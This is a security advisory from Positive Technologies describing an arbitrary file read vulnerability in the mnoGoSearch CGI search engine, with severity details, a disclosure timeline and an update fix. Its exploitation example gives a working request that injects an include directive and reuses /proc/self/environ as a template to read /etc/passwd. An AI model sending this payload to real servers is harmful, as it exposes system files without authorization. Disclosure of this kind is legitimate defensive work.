Lucene search

K
ptsecurityPositive TechnologiesPT-2013-17
HistoryJan 03, 2013 - 12:00 a.m.

PT-2013-17: Arbitrary Files Reading in mnoGoSearch

2013-01-0300:00:00
Positive Technologies
www.ptsecurity.com
3

PT-2013-17: Arbitrary Files Reading in mnoGoSearch

Vulnerable software

mnoGoSearch
Version: 3.3.12 and earlier

Application link:
<http://www.mnogosearch.org/&gt;

Severity level

Severity level: High
Impact: Arbitrary Files Reading
Access Vector: Remote

CVSS v2:
Base Score: 7.8
Vector: (AV:N/AC:L/Au:N/C:C/I:N/A:N)

CVE: not assigned

Software description

mnoGoSearch is a universal Intranet and Internet search engine.

Vulnerability description

Positive Technologies experts have detected an Arbitrary Files Reading vulnerability in mnoGoSearch.

Passing startup parameters via QUERY_STRING (<http://tools.ietf.org/html/draft-robinson-www-interface-00#section-7&gt;) for an application running in CGI mode can be used to set page template path variable “d”. Generating a template file on the server and specifying it in the variable “d” can result in Arbitrary Files Reading via <!INCLUDE CONTENT=“URI”> template structure.
-–[ Exploitation example]
The /proc/self/environ file, in which part of the template is formed through the PATH_INFO environment variable, can be used as a template.
<!–top–>
<!INCLUDE CONTENT=“file:/etc/passwd”>
<!–/top–>

<http://host/cgi-bin/search.cgi/ <!--top--> <!INCLUDE CONTENT="file:/etc/passwd"> <!--/top-->?-d/proc/self/environ&gt;

How to fix

Update your software up to the latest version.

Advisory status

15.02.2013 - Vendor gets vulnerability details
01.03.2013 - Vendor releases fixed version and details
05.03.2013 - Public disclosure

Credits

The vulnerabilities has discovered by Sergey Bobrov, Positive Research Center (Positive Technologies Company)

References

<http://en.securitylab.ru/lab/PT-2013-17&gt;
<http://www.mnogosearch.org/bugs/index.php?id=4818&gt;

Reports on the vulnerabilities previously discovered by Positive Research:

<http://ptsecurity.com/research/advisory/&gt;
<http://en.securitylab.ru/lab/&gt;